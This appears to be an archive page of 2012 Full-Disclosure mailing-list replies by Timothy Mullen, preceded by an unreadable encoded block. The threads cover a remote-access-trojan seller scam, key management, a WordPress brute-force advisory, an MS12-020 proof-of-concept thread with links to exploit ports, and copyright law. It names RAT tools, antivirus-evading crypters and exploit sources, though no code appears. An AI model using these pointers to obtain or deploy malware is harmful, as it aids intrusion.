cMqtd1d/2kIy0y5R0p9lsGKy3UHejuPP2x9KRWjb7en7GFnC9u3BE/92qOxJO1x98pdYn3 HS6QkmJKM1cvHhoxrowT8T87YEjK6o3J6s36xKW6kzTVS6AQMS8CfAb2lodheqvccREFUo PB/3n7BXbGT1gk9udApaaCcu8nNCsjDVfVMfYMuDk2SsJzkZvhOylsJNYmLrd9TuGOh7XT Dqi5GjT9Bg2rPFImxuuB5Y1kSag9Po2FKAfHIfxmDzPQQDo7wyclN5yrGmVCJOZfRZuFOQ cRh1t9p+F2eoe/zJJcN3BuMaCNyoEHx4ePDEtrCmYvvrSwCn7MBZM2qI/fZnuQp6SsbwyC znDub2wtx+Yjz4hoYnmDd3B2uY11WZ8Fd3NOHV9vcNhEfr2gjCyJoaSK2chiz1BJGWlI85 Gy1h9onf8wLxwNh6+S5HJ4PrDG8uF/SsDHIiODyWfwLtX/fVfdumNw1bINQMdSfJDw7ViH lmWuOlDaJHQY2soeI/mSB8Wem7551iS//jN4iCM8yJ0RDKay8d4HHRdGFyy4zGMVByzTOy AqH3k90eQjB+8DW8Jzo/Yi8mxYD1Z54aZycamhN2R9x3u08tf/AUdw0+nymbaksnQireZH 6YIGNd2WutE2R/2/fGmDR0YebA4dP7KJ0NzKnLzFYnCY/WR9oxdKRHCa8pY1xvs+V722+q LHmI97bKkxWEnY+FkuxhlZiMDMIEpFTifoXlQlqVUQoqFgV2HZO7KeUZMtm2yzUvcKUeOj 2gHs0Qw9z0QxcMqe0Pp1k8ZqoSBqO7T4j3LHDkwwvfe8kp6ve9QhksYLnqI/5Gegu7/lz1 srwFo8+kbAMns/O55h5ISQOV5T7ElSgDEhQqDRFA3fdytgjZDFsB0JVkvb89dtJUU89qC9 fX08hg1YZzAdoyDsefRu5dAwOfOeXKVmVkbIUcEASm5/8k1gvdDEDy6gBl0u1xLOGYK0i3 liyLlOgWbPA3iEmYsGZyorRKn5q2sT/BVNQQTL9wdZiw3d8Zu0SiHpZyW98SfrOL3bHC0a xIK+VFd3sQXm98l6IV/hGoevr4zRFrWktiCnh5QG5viy4NcoqCcgkU514v4RUMjQMytEKQ hGgTOoJdAdutlD8B0nQ5pYExcecamlMhWwjujjw988b/GlQ9cnchGzLoSVxdgo2Xuvetxs FPnTzpl5kv4rLtnepAzfJbs4WQziLSUijK+BtnZVujpihFDkz2ZFMIcOiVaKLtl1kU2uBC ziw2WrBsq37CyzZZRhr9vNd4PWO6QBopPq4pPTM3llQ0nUrnGNDfmc05kSRxM4eiprKxGo BYdMJfOfcFPj49qbUb8TYtYz3Fgoc46cfwmVKGOQkJdSJzD8vVKj8BdguLGLf4s0IQrxnc LWGjOAic4nz7x /KeyFobs [Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com
Re: [Full-disclosure] www.LEORAT.com is scam
It's called Karmaware. From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of smith joseph Sent: Friday, March 30, 2012 6:54 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] www.LEORAT.com is scam LEORAT.COMhttp://LEORAT.COM is SCAM | LEOIMPACT.COMhttp://LEOIMPACT.COM is SCAM | LEORAT.COMhttp://LEORAT.COM is SCAM Yes. . I bought this RAT software from him. He claims that he is having is own RAT but they all are freeware. 1. Darkcomet 2.Xtream Rat google it even you can find better RAT free of cost on net. he will give you BOT which is again freely available on net. And last he uses Father Crypter to crypt all RAT output files. and this is pure bullshiz. All will be detected by Anti viruses after few hours. Before buying they said they will be giving FUD server, (Commercial Exploits Packs for Reliable Deployment in ZIP, EXE, Single XLS(office 2007), JPG+LNK, PDF File(9.3.0) Browser Pack) but nothing given. Once you start using it nothing goes according to his claimed way and fails. You have only option left is KEEL EMAILING and CALLING. He will never respond to you again.. Bloody money sucker. Result: LEOIMPACT.COMhttp://LEOIMPACT.COM is SCAM LEORAT.COMhttp://LEORAT.COM is SCAM LEORAT.COMhttp://LEORAT.COM is SCAM ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PcwRunAs Password Obfuscation Design Flaw
You've well-articulated a problem most (if not all) of the implementations I've seen just dance over. The application accomplishes the encryption requirements stipulated by policy or regulation, but the key is easily available to the application and of course to attackers. I have no idea what mitigation techniques are available for PHP, but in .NET/Win applications there are a couple of first step attempts to at least address the problem. First you've got DPAPI, which in its simplest form is an API that allows the application to encrypt/decrypt data by way of keys stored in the system certificate store which is protected by a different set of credentials. The attacker would have to get system to get to the keys. Of course, if the attacker could alter code as you've outlined, then they could very well just use the API to decrypt data without worrying about getting the keys themselves. The problem with DPAPI is that it is system-based. The data encrypted by that system can only be decrypted by that system. That won't work in distributed environments, and it can be problematic in system failure scenarios. To get passed single-machine issues, there is another method called DKM, which as the name infers is a distributed key management system based on AD and the machines' membership is appropriate groups given access to the keys. So in a similar fashion, keys are protected by secondary credentials at the machine level. Again, this requires an attacker to gain system access to get the keys, but again, gives an attacker with file-level access where code can be changed access to the procedure calls to get the data if they have to. It is a very difficult problem to solve, but it all comes down to risk management. If you are protecting against off-line attacks or attacks from other systems, DPAPI or DKM will definitely help. If you are protecting against attacks where SYSTEM access is granted, it gets far more difficult (one may even say quite improbable) to protect the keys. What I've been doing myself is a bit different, but it ultimately suffers from the same potential issues: As part of my TGP suite, I've extended functionality to WinMobile so that data encrypted on the PC can be exchanged and decrypted on the phone. It's pretty cool actually... to get around the key management issues, I wrote an API where the devices authenticate to, and use certificates to gain access to the encrypted keys on a centralized key store. On the phone, the calls are made each time keys are needed. On my web servers, the call is actually made on application startup, storing the keys in memory.At any time one becomes aware of some breach, you can cut off access to the keys. Not ideal of course, but it works. I'm not worried about the BSOD scenario. The remote attacker would have to cause a BSOD, and then somehow access the dump. In production systems, the page files are typically kept on another drive (well, maybe not typically but that is up to the admins) in which case the dump won't exist. But to your point, I just looked at my own web VM, and it is indeed set to do a full dump to the system drive. I still don't think there is enough of a risk of that type of breach to warrant changing the paradigm from system-only access to keys in memory. I too would be interested in hearing what processes others are using to address this. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of b Sent: Tuesday, March 27, 2012 6:16 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] PcwRunAs Password Obfuscation Design Flaw So this brings up an interesting problem to tackle: How can you encrypt things for use by applications such as service account credentials for authentication to other systems and database access credentials on disk in such a way that the application can obtain the encrypted information without prompting the end user for a decryption passphrase and an attacker with local filesystem access cannot obtain the encryption key to the credentials by simple computation (like if you had the encryption key calculated based on some static/easily guessable information)? I have seen some attempts to solve this problem, such as with setting up SSL certs for apache's use if the certs private key is encrypted, you have to supply the private key decryption password at application startup and the key then lives in memory. This isn't very practical, in my opinion, in most environments I have seen because an unplanned outage could require system reboots by your monitoring personnel who might not know the application decryption passphrase and higher administrators have to be called in to start the services up properly. With web pages written in something like PHP, it would be even less practical because then you
Re: [Full-disclosure] Mexican Drug Cartels and Cyberspace
I seriously doubt the Mexican drug cartel's would be kidnapping programmers. They'd be taking out their best clients. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu Sent: Monday, March 26, 2012 8:30 AM To: Dave Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Mexican Drug Cartels and Cyberspace On Mon, 26 Mar 2012 16:14:21 +0100, Dave said: Looking forward to a Mexican standoff? Short-tempered and easily excited trigger-happy Mexican gangsters versus psychopathic Russian gangsters? The proper time units for how long *that* standoff will last are usually foind only in textbooks on subatomic physics. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple IOS security issue pre-advisory record
Making a conclusion of community behavior, good or bad, based on some indication of a number of clicks on some link is non sequitur. I actually don't see any reason why one would be surprised by a security community following links anyway. I've got a VM specifically used for this type of thing, and I know many others do as well. Many probably *want* the link to be malicious so they can analyze and harvest any potential attack and see if it is new or interesting. There is no corollary to qualified behavior from some ambiguous report that 300 security researchers who should have known better. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of fulldisclos...@briaeros007.org Sent: Monday, March 26, 2012 9:19 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Apple IOS security issue pre-advisory record Hello, I'm one those who clicked on it (and to make matters wors : after it was discover and discussed). Why I click on it : it's a big thread and wanted to begin the reading with the first post ^^. The fact that I run it on a noscript activated up to date firefox doesn't change the fact that I run it without too much attention and I'm the one to blame it. So for the possible aggressive reacions : yes, but only about myself. To be frank, the first things I was thinking after seeing what was the link was well : owned like a newbie. Cordially. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Brute Force vulnerability in WordPress
He knows there’s nothing to any of these advisories – he just does it to drive traffic to his site for Google Ads. t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Zach C. Sent: Sunday, March 25, 2012 5:05 PM To: InterN0T Advisories Cc: full-disclosure@lists.grok.org.uk; MustLive; submissi...@packetstormsecurity.org Subject: Re: [Full-disclosure] Brute Force vulnerability in WordPress He also considers it a vulnerability to tell a new user that the username they've picked out has been taken by another user. On Sun, Mar 25, 2012 at 3:09 PM, InterN0T Advisories advisor...@intern0t.netmailto:advisor...@intern0t.net wrote: Same type of vulnerabilities exist in 99,999...% of all web applications including your website. Even if you can't bruteforce all the time, you can adjust it with timing, and e.g., proxies, different user-agents, etc., and then you have Timed Bruteforce Attacks which works on pretty much all websites. Did you also mention this 5-10 years ago on your web site about website security named websitesecurity.com.uahttp://websitesecurity.com.ua? Also, when will you stop posting about: bruteforce/full path disclosure/locking actual users out/and other low priority vulnerabilities that exist in most web apps, and completely move on to vulnerabilities that matters? Seriously, anyone can find these vulnerabilities and the reason why anyone hasn't reported / disclosed / complained about them is because they exist in most apps and doesn't compromise the security of the end-user nor the website. Will the next thing you disclose be about bruteforcing SSH because it by default doesn't lock users out? It's been like this for +10 or +20 years. What I find funny is that either you: A) Say a web app has a vulnerability because it doesn't lock the offending user out because of too many password tries, OR B) Say a web app has a vulnerability because it does lock out the offending user because of too many password tries. It's almost a contradiction and an endless evil circle. You can't have both, ever. No offense intended of course. Best regards, MaXe On Sun, 25 Mar 2012 23:45:33 +0300, MustLive mustl...@websecurity.com.uamailto:mustl...@websecurity.com.ua wrote: Hello list! There are many vulnerabilities in WordPress which exist from version 2.0, or even from 1.x versions, and still not fixed. So I want to warn you about one of such holes. It's Brute Force vulnerability via XML-RPC functionality in WordPress. - Affected products: - Vulnerable are WordPress 3.3.1 and previous versions. -- Details: -- Brute Force (WASC-11): http://site/xmlrpc.php In this functionality there is no protection against Brute Force attack. At sending of corresponding POST-requests it's possible to pick up password. Note, that since WordPress 2.6 the XML-RPC functionality is turned off by default. WP developers did it due to vulnerabilities (such as SQL Injection and others), which were found in this functionality, i.e. not motivating it as counteraction to Brute Force, but it worked also as protection against Brute Force attack. So this issue doesn't concern those who uses WordPress since version 2.6 with default settings. But those who needs to use XML-RPC, those will have Brute Force vulnerability, because the developers didn't make reliable protection against it. Earlier in 2008 and 2010 years I've already wrote about Brute Force vulnerabilities in WordPress (http://websecurity.com.ua/2007/ and http://websecurity.com.ua/4016/ SecurityVulns ID: 10677) and it's another such vulnerability. Besides them there is also known BF attack not via login form, but with using of authorization cookie (when by setting different cookies it's possible to pick up password). Timeline: 2012.03.20 - disclosed at my site. I mentioned about this vulnerability at my site (http://websecurity.com.ua/5723/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] is my ISP lying or stupid?
Actually, those promiscuous sub-VLANs are bad news. I got a virus from one that turned my hard drive into a floppy. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Giles Coochey Sent: Wednesday, March 21, 2012 8:49 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] is my ISP lying or stupid? On 2012-03-18 16:09, James Condron wrote: The routers of an ISP are sorta DHCP in the sense that the IPs are dynamic- DHCP really works as one network whereas an ISP switch will have a series of /30 vlans for obvious reasons. Getting an IP and connection is more complex than that but already we're down to a series of routers. No, they'd use private VLANs with the default router in a promiscuous sub- VLAN. That way they won't have to waste 4 IPs for every customer. Customers with multiple IPs can be put in community sub-VLANs, if they pay for it. Networking works very differently within Service Provider networks. A lot of it is technology that makes itself look like other technologies you might be familiar with, but what is happening behind the scenes is actually completely different. Just thought you might like to know. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ms12-020 PoC
You establish a connection to TSGateway via RPC over HTTP in an SSL tunnel. Once you are authenticated and authorized, the TSGateway server will establish a connection via RDP to the target server, tunneling the RDP connection back to you within the RPC/HTTP(S) channel. As such, TSGateway is obviously unaffected by this vulnerability. For those of you looking for mitigation and not kiddie code to pop a box, note that simply using NLA mitigates both RDP issues. This might be a good time to point out than anyone who followed any of my advice in the RDP chapter of Thor's Microsoft Security Bible, or who is using the little ThoRDP tool I wrote (also in the book) was protected from these vulnerabilities way before they were discovered. I say that to simply identify that some simple, effective techniques can be deployed that thwarts the hours and hours people put into developing exploit code and the wasted time chasing all this stuff down. *THAT* is what security is about, btw. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Nahuel Grisolía Sent: Friday, March 16, 2012 11:41 AM To: root Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] ms12-020 PoC Guys, What about TS Gateway? which is actually listening on port 443 (by def)... thanks! Nahu. On 16 March 2012 15:12, root ro...@fibertel.com.ar wrote: The SABU code is fake (go figure). This python script is the first port of the Luigi code to python, that's why sucks. Here are better ports: http://pastebin.com/4FnaYYMz and http://pastebin.com/jzQxvnpj On 03/16/2012 02:50 PM, Exibar wrote: Is that the same code from yesterday? I thought that code was a fake and didn'kt do anything? Anyone confirm this? Exibar Sent via BlackBerry by ATT -Original Message- From: kyle kemmerer krkemme...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 16 Mar 2012 12:01:16 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] ms12-020 PoC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ms12-020 PoC
P.S. Before someone starts accusing me of spamming for the book, (one asshat tried to compare me to Juan whats-his-face once) note you can actually view most of the RDP chapter (and others) on the Amazon preview a page feature if you would like. If you are interested in RDP security, I suggest you take a free read on Amazon. Many are worried about worm activity from 020, and I am far more interested in pointing you to free material that helps you secure yourself and others than I am trying to make a buck on the book. If anyone has any questions about how any of this works, I'm happy to help if I can. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God) Sent: Sunday, March 18, 2012 9:21 AM To: Nahuel Grisolía; root Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] ms12-020 PoC You establish a connection to TSGateway via RPC over HTTP in an SSL tunnel. Once you are authenticated and authorized, the TSGateway server will establish a connection via RDP to the target server, tunneling the RDP connection back to you within the RPC/HTTP(S) channel. As such, TSGateway is obviously unaffected by this vulnerability. For those of you looking for mitigation and not kiddie code to pop a box, note that simply using NLA mitigates both RDP issues. This might be a good time to point out than anyone who followed any of my advice in the RDP chapter of Thor's Microsoft Security Bible, or who is using the little ThoRDP tool I wrote (also in the book) was protected from these vulnerabilities way before they were discovered. I say that to simply identify that some simple, effective techniques can be deployed that thwarts the hours and hours people put into developing exploit code and the wasted time chasing all this stuff down. *THAT* is what security is about, btw. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Nahuel Grisolía Sent: Friday, March 16, 2012 11:41 AM To: root Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] ms12-020 PoC Guys, What about TS Gateway? which is actually listening on port 443 (by def)... thanks! Nahu. On 16 March 2012 15:12, root ro...@fibertel.com.ar wrote: The SABU code is fake (go figure). This python script is the first port of the Luigi code to python, that's why sucks. Here are better ports: http://pastebin.com/4FnaYYMz and http://pastebin.com/jzQxvnpj On 03/16/2012 02:50 PM, Exibar wrote: Is that the same code from yesterday? I thought that code was a fake and didn'kt do anything? Anyone confirm this? Exibar Sent via BlackBerry by ATT -Original Message- From: kyle kemmerer krkemme...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 16 Mar 2012 12:01:16 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] ms12-020 PoC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ms12-020 PoC
They did last time... But your advice is actually well noted :) -Original Message- From: James Condron [mailto:ja...@zero-internet.org.uk] Sent: Sunday, March 18, 2012 10:06 AM To: Thor (Hammer of God); full-disclosure-boun...@lists.grok.org.uk; full- disclos...@lists.grok.org.uk Subject: Re: [Full-disclosure] ms12-020 PoC Nobody said a word. Relax more and you might live long enough to write your next book. Sent using BlackBerry® from Orange -Original Message- From: Thor (Hammer of God) t...@hammerofgod.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Sun, 18 Mar 2012 17:03:25 To: full-disclosure@lists.grok.org.ukfull-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] ms12-020 PoC P.S. Before someone starts accusing me of spamming for the book, (one asshat tried to compare me to Juan whats-his-face once) note you can actually view most of the RDP chapter (and others) on the Amazon preview a page feature if you would like. If you are interested in RDP security, I suggest you take a free read on Amazon. Many are worried about worm activity from 020, and I am far more interested in pointing you to free material that helps you secure yourself and others than I am trying to make a buck on the book. If anyone has any questions about how any of this works, I'm happy to help if I can. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God) Sent: Sunday, March 18, 2012 9:21 AM To: Nahuel Grisolía; root Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] ms12-020 PoC You establish a connection to TSGateway via RPC over HTTP in an SSL tunnel. Once you are authenticated and authorized, the TSGateway server will establish a connection via RDP to the target server, tunneling the RDP connection back to you within the RPC/HTTP(S) channel. As such, TSGateway is obviously unaffected by this vulnerability. For those of you looking for mitigation and not kiddie code to pop a box, note that simply using NLA mitigates both RDP issues. This might be a good time to point out than anyone who followed any of my advice in the RDP chapter of Thor's Microsoft Security Bible, or who is using the little ThoRDP tool I wrote (also in the book) was protected from these vulnerabilities way before they were discovered. I say that to simply identify that some simple, effective techniques can be deployed that thwarts the hours and hours people put into developing exploit code and the wasted time chasing all this stuff down. *THAT* is what security is about, btw. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Nahuel Grisolía Sent: Friday, March 16, 2012 11:41 AM To: root Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] ms12-020 PoC Guys, What about TS Gateway? which is actually listening on port 443 (by def)... thanks! Nahu. On 16 March 2012 15:12, root ro...@fibertel.com.ar wrote: The SABU code is fake (go figure). This python script is the first port of the Luigi code to python, that's why sucks. Here are better ports: http://pastebin.com/4FnaYYMz and http://pastebin.com/jzQxvnpj On 03/16/2012 02:50 PM, Exibar wrote: Is that the same code from yesterday? I thought that code was a fake and didn'kt do anything? Anyone confirm this? Exibar Sent via BlackBerry by ATT -Original Message- From: kyle kemmerer krkemme...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 16 Mar 2012 12:01:16 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] ms12-020 PoC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com
Re: [Full-disclosure] Fw: Earth to Facebook
Why not just provide them with the contact and they can forward it on directly? Then you could obviate the entire trust issue... t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of upsploit advisories Sent: Sunday, March 18, 2012 1:56 PM To: Michal Zalewski Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Fw: Earth to Facebook The only other people that see the vulnerability are the select few in upSploit. However if the vendor is already in the upSploit database the advisory gets submitted straight away to the vendor. If you want to try it out there should be an upSploit vendor in the vendor list. Submit some advisories there. There is no ploy - like anything it is about trust. I created the service because when I first started I found it hard to find contacts sometimes. Use it if you want, don't if you don't. Simple as that really! Use it once for something you may not care about to much and see how it works for you. Thanks, On 18 March 2012 20:22, Michal Zalewski lcam...@coredump.cxmailto:lcam...@coredump.cx wrote: Without meaning to advertise, that is one of the reasons upSploit was created - so that you could submit a vulnerability and then upSploit automatically sends to the vendor. This way you and your friend don't have to do any of the work on the disclosure. I clicked around and don't see any obvious explanation; other than the reporter and the vendor, who else gets to see the submissions and under what circumstances? /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] is my ISP lying or stupid?
Exactly. t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Peter Maxwell Sent: Saturday, March 17, 2012 8:28 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] is my ISP lying or stupid? What makes you think those services would be split onto separate switches (which would be rather odd actually)? On 16 March 2012 16:30, Jerry dePriest jerr...@mc.netmailto:jerr...@mc.net wrote: They had a DoS of mail, www and shell. They state a switch went out. who runs mail, www and shell on the same switch? (This might be a trick question, think it thru...) bma ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
-Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu Sent: Friday, January 27, 2012 4:06 PM To: Michael Schmidt Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] when did piracy/theft become expression of freedom On Fri, 27 Jan 2012 18:06:28 GMT, Michael Schmidt said: You want to be very careful with that line of thought. You are taking the creator the rightful owners profits, which they are entitled to if it is a product they created to be sold. You might want to go read Courtney Love Does The Math, and then ask yourself the following: 1) You can make a case that if you copy an album intead of buying it, you're depriving somebody of profits. But what if it's an album that you would *not* have bought at full price anyhow? Or one that you bought used (see first sale principle)? These arguments do more harm than good. You can't base property law on what people may not have done (of course there are not paid your taxes etc - let's not get tied down with that). I'm actually surprised you made that comment. I have a product that I own the rights to. If you don't feel like paying full price, then don't buy it. You go down the street and buy a similar product for less money. That way I don't make money, and my competitor has. If this happens enough, I go out of business as an effect of how the market works. But if you were not going to pay full price, that doesn't give you any right to steal it. That is simply absurd. Now, many in the music industry have openly stated (I've heard anyway) that internet piracy is good for business. People hear music they wouldn't have heard, and buy the album. I've done this myself, and I agree with it. But whether or not the behavior ends up benefiting the industry or not is irrelevant; I've still broken the law. That's where is should end, but it doesn't. Sharing music not purchased is already illegal. The companies already have legal remedies available. Unfortunately, the industry lobbyists have convinced lawmakers that the action already being illegal isn't enough - they now want the legislative body to ENFORCE the law for them by giving execution rights to the plaintiff. That is freaking nuts. What should happen is that those who do not innovate in music distribution and rights management pay to see the legal process through. Then we're back to the first example where they would end up spending too much money on legal fees and go out of business where the guys who figure out a cool DRM scheme for sampling, sharing, etc end up making money, and the market takes care of its own. It's far easier and cheaper to get inept and ignorant legislators to extend judgment into enforcement with new laws. 2) Who gets those profits, the artist, the label, or the RIAA? Are you stealing profits from the artist, or are you stealing them from somebody else who was attemting to steal them from the artist? The fun begins when the record companies start sniping each other. Remember when The Verve got their pants sued of by the Rolling Stones copyright holder for Bittersweet Symphony? It was a clean cut case of copyright infringement. What if SOPA or the next round of it does pass - will ABKCO Records legally be able to get Hut Records entire web site shut down? The main point here is that legal remedy for property rights already exists, and the holders of those rights should be required to exercise due process just like everyone else. t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Rate Stratfor's Incident Response
+1 -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of BMF Sent: Thursday, January 12, 2012 5:30 PM To: noloa...@gmail.com Cc: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu; Benjamin Kreuter Subject: Re: [Full-disclosure] Rate Stratfor's Incident Response On Thu, Jan 12, 2012 at 4:17 PM, Jeffrey Walton noloa...@gmail.com wrote: Is it a house, or is it a public store like Walmart or Home Depot? And thus begins the inexorable failure of the computer security is like physical security analogy... BMF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CertificationMagazine - Blind SQL Injection Vulnerability Super vulnerability-lab hack
i am not member of ariko-security / but it's not possible what you have wriiten it's primitive slander. FYI, you can't write slander. One speaks slander, one writes libel. t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] prosec
No workie. From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of white powder Sent: Tuesday, December 06, 2011 3:10 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] prosec http://130.89.241.130/~tjibbe/pics/karma-sometimes-assholes-get-what-they-deserve.jpg u had it comin, kcope AB u will be next welcome to the age of the whitehat ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Client aproach
